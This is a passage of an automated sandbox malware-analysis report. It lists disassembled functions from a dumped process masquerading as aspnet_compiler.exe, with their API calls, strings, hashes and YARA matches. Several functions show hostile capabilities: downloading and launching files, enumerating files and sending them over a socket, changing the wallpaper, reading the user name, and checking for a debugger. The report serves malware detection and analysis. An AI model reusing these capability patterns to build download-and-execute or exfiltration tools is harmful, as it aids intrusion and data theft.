                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                          • _free.LIBCMT ref: 00448233
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                          • String ID:
                                                          • API String ID: 1286116820-0
                                                          • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                          • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                          • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                          • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                          Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DownloadExecuteFileShell
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$open
                                                          • API String ID: 2825088817-4294605632
                                                          • Opcode ID: 994fa26aecbf6e7c3222de66d1bae1110effc07295645d0cc09e5d0c67af1d4a
                                                          • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                          • Opcode Fuzzy Hash: 994fa26aecbf6e7c3222de66d1bae1110effc07295645d0cc09e5d0c67af1d4a
                                                          • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                          Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$FirstNextsend
                                                          • String ID: x@G$x@G
                                                          • API String ID: 4113138495-3390264752
                                                          • Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                          • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                          • Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                          • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                          Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                            • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                            • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                            • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                          • API String ID: 4127273184-3576401099
                                                          • Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                          • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                          • Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                          • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                          Function 00450A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                          • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                          • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                          • String ID:
                                                          • API String ID: 4212172061-0
                                                          • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                          • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                          • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                          • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                          Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00408DAC
                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$FirstH_prologNext
                                                          • String ID:
                                                          • API String ID: 301083792-0
                                                          • Opcode ID: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                          • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                          • Opcode Fuzzy Hash: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                          • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                          Function 00450E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                                          • String ID:
                                                          • API String ID: 2829624132-0
                                                          • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                          • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                          • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                          • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                          Function 0043A65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A75F
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A76C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                          • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                          • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                          • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                          Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                          • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                          • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                          • String ID:
                                                          • API String ID: 1815803762-0
                                                          • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                          • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                          • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                          • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                          Function 0044D5E9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .
                                                          • API String ID: 0-248832578
                                                          • Opcode ID: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                                                          • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                          • Opcode Fuzzy Hash: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                                                          • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                          Function 00450D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                          • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID: <D
                                                          • API String ID: 1084509184-3866323178
                                                          • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                          • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                          • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                          • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                          Function 00450DDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                          • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID: <D
                                                          • API String ID: 1084509184-3866323178
                                                          • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                          • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                          • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                          • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                          Function 00447597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: GetLocaleInfoEx
                                                          • API String ID: 2299586839-2904428671
                                                          • Opcode ID: f5e2153e4984e43413bf11c07bd0b6bdf0abc05710bcbde66c151b87e472c2d2
                                                          • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                          • Opcode Fuzzy Hash: f5e2153e4984e43413bf11c07bd0b6bdf0abc05710bcbde66c151b87e472c2d2
                                                          • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                          Function 00440E20 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                          • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                                                          • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                          • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                                                          Function 004520D2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                          • Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
                                                          • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                          • Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
                                                          Function 00432A49 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                          • Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
                                                          • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                          • Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                                                          Function 004510BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                                          • String ID:
                                                          • API String ID: 1663032902-0
                                                          • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                          • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                          • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                          • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                          Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$InfoLocale_abort_free
                                                          • String ID:
                                                          • API String ID: 2692324296-0
                                                          • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                          • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                          • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                          • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                          Function 0041A7A2 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                          • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                          • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                          • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                          Function 004470AE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                          • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                          • String ID:
                                                          • API String ID: 1272433827-0
                                                          • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                          • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                          • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                          • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                          Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                          • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
